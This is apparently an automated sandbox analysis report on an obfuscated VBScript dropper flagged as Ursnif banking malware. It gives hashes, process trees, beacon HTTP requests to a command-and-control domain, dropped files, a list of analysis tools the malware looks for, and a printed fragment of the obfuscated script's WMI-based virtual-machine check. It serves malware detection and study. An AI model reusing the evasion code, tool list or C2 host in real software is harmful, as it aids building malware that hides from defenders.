
Analysis Report YvGLRQ2lBoNg.vbs

Overview

General Information

Sample Name: YvGLRQ2lBoNg.vbs
Analysis ID: 284796
MD5: 0671e735481a55031081895bf0f57760
SHA1: 11788132e8b10e6370530d68d2d562737ef1dae0
SHA256: f9ad25e0810fc3f545213be438f531677595044c6a64d6b367e93b9aad9910e6

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Startup

  • System is w10x64
  • wscript.exe (PID: 5576 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\YvGLRQ2lBoNg.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 5524 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6500 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5524 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5928 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6120 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5928 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(3 further entries collapsed in the original view)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ogress.psd | Avira: detection malicious, Label: TR/Kryptik.fklcr
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at | Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ogress.psd | Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\Temp\ogress.psd | ReversingLabs: Detection: 20%
Multi AV Scanner detection for submitted file
Source: YvGLRQ2lBoNg.vbs | Virustotal: Detection: 21%
Source: Joe Sandbox View | ASN Name: SELECTELRU SELECTELRU
Source: global traffic | HTTP traffic detected: GET /api1/d_2FkQMQPNS1PtreuLmDr0c/isKQ3en2ep/WdaePBnxWvNr4O7Zx/fe5GpcKXEs0Z/nWv1haJIdxX/KPQImnsWZc6Bts/3T1sv6KdCgBkk8kTcY4Tw/vLBIAR6SvcfKkftr/v3qWzzjdQvHhSwJ/vN5Dy_2FrTM09tl_2F/E9H6fSft8/LNlFBPxAbjE4J0c6TJOC/anV9v94dZW1QTs_2Fbn/bfOfyFPP6TfVwktOgPJiQQ/RMTYA97pNPcLL/nGwKPMp2/dEpg95nX_2B2Qt_0A_0DKLH/tTw8xa4uQv/h6OXh5Fmz3Z3zI7T2/MnlbUyKlzKYN/4KNu2_2B_2B/GIckXkWWxkB/utBojx5s HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/1D7z5XkAX/_2FbQrtYcD1kFDfXonyT/Jj2mYzkdYtc4R7X6fxc/9urYr1WZcWa6ZWnQBAZ43f/xval831E1IBwG/n6pzC3ar/eKGANQIthekvo9zg_2Fb94x/iPFw6um9yA/exbRhIIlmYTmBTpxl/jJEsgsP3dBx9/zs5yDfHduFs/ySeUPKocHhrMVB/Q8EDMO_2B3zJSk5QBFGvT/Yy3iBRuEUbqp4Kxn/CqGIdwKcFdmihQj/fosd0P6SSgwFfVNavf/RyCG8rcLK/w_0A_0D7W0vvsSLrshwz/e9K8aNiOBT0pOorA5hH/f7RmqSwXFZJni1LXH4cpYp/tjerjQMglan/92z HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: msapplication.xml1.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x81a0cb84,0x01d68993</date><accdate>0x81a0cb84,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x81a0cb84,0x01d68993</date><accdate>0x81a0cb84,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x81a32dd6,0x01d68993</date><accdate>0x81a32dd6,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x81a32dd6,0x01d68993</date><accdate>0x81a32dd6,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x81a5901e,0x01d68993</date><accdate>0x81a5901e,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.17.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x81a5901e,0x01d68993</date><accdate>0x81a5901e,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: msapplication.xml.17.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.17.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.17.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.17.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.17.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.17.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.17.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.17.dr | String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\ogress.psd 034F2720D2408955AE412FD3657F6D1E50677CFCC8B5D030F3BC1F9D195AD21F
Source: YvGLRQ2lBoNg.vbs | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: mal100.troj.evad.winVBS@7/17@2/1
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\YvGLRQ2lBoNg.vbs'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: YvGLRQ2lBoNg.vbs | Virustotal: Detection: 21%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\YvGLRQ2lBoNg.vbs'
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5524 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5928 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5524 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5928 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Automated click: OK
Source: C:\Windows\System32\wscript.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync
Source: YvGLRQ2lBoNg.vbs | Static file information: File size 1452344 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\meet\well\Brought\story\During\2\claim\84\Could\6\Element\Motion\3\Shore\market.pdb source: ogress.psd.1.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(555551152)) > 0 And astronomy146 = 0) ThenExit Function' gargle triphammer fusillade Emile goober height Colombia317 Cameroon infantile macaque Virgil15 larynx Blair Vassar citron Marjory319 ticket Horowitz doubt pounce genius prolate expurgate trichloroethane hap114 gurgle spear Tommie stereo contraption clank710 counterfeit boutique teenage attrition stratify stannic polysemous volcanism candle stenographer649 noontime metallography, 8485223 chrome night clapboard squalid wacky. 1611065 iambic Belgrade697 peaceful kickback formulaic versus tuff598 xerox899 gaur registrable quagmire. distort767 bodybuilding channel diagrammed parolee900 Balzac. acme. Kirkpatrick stardom virgin payroll688, 230300 Corbett646 Isaiah tectonic Sharon787 abolition planet nightshade Bini touchdown condescension effusion728 societal proverbial822 raven erosion twig gadgetry. cavalier townsmen Arlen solitary exclusive Togo side960 crore gardenia skyhook proctor End IfSet waggle651 = GetObject("winmgmts:\\.\root\cimv2")Set adjust193lItems = waggle651.ExecQuery("Select * from Win32_Processor", , ((46 + 34.0) + (-((88 + (-60.0)) + 4.0))))For Each glycine543 In adjust193lItemsIf glycine543.NumberOfCores < (((1786 - 1758.0) + (40 + (-30.0))) - 35.0) ThenISsAHR = TrueREM soup extent populism curvilinear Ethiopia290 adposition lineman glycerinate77 Hillcrest Vance scapula metazoa console48 athletic herringbone raillery jure adorn fiance Middlesex miniature58 spiritual McHugh813 Bengal repelling pyrotechnic bivalve215 Cottrell Sandburg seder swart murk comprehend serology Tunis souvenir362 hoodlum quartile pike switchboard clairvoyant arabesque580 continual bindle collard616 chassis rainy fifteenth shorthand End IfREM prosody indices. 2301989 booky875 Swede hardcopy lessee devotion507, 9597409 Congo542 commandant493 Syria. bakery692. 
tori bushy560 highball nugget401 bedfast Copenhagen down commensurate dot paragon574 surname spree clairvoyant664 Oneida Bose636 CDC panicky. 851619 begetting. 5002303 bifocal945 Bushnell134 prick827 planeload113 equatorial187. keelson slapstick merchant511 nor contrabass leggy cluster Stewart rheostat Essen471 spheric re lobby henceforth merrymake spangle Leland contain Standish crutch607 blowup smuggle Wittgenstein650 fugal, 745304 Thessaly. 9793611 conqueror851 Casanova770 transferral spear282 indecomposable Macedonia ecosystem poison pathogenic, skipjack idyllic980 solitude moose Palomar Knapp un shrimp archetype yarn Multics radian Howe291 Cowan Caldwell, converge aching isocline Bavaria variable otiose977 voyage paper, autopilot332 NextIf ISsAHR ThenAYdtfwwDEnd If' minesweeper548 violin603, glove scowl mignon40 Markov lovebird, thirst godmother Mukden Cranford. gunmen Wilma genealogy ski tokamak947 abetting ecosystem715 apocalyptic, sora tyrannicide serf resist Eduardo Christensen Catherwood disrupt mercurial seaboard, 6929809 rein933 fin extent210 polytope. qua modern10 . indelicate lycopodium explicate hesi

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\ogress.psd
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\ogress.psd

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\yvglrq2lbong.vbs
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
Source: C:\Windows\System32\wscript.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogress.psd
Source: C:\Windows\System32\wscript.exe TID: 1420 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: ogress.psd.1.dr | Binary or memory string: /ku ridg;> on g,saiprlFsF/o( gtts

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: ogress.psd.1.dr
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: avz.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: cports.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp | Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 121 | Path Interception | Process Injection 1 | Masquerading 11 | OS Credential Dumping | Security Software Discovery 241 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 121 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 4 | LSASS Memory | Virtualization/Sandbox Evasion 4 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 1 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
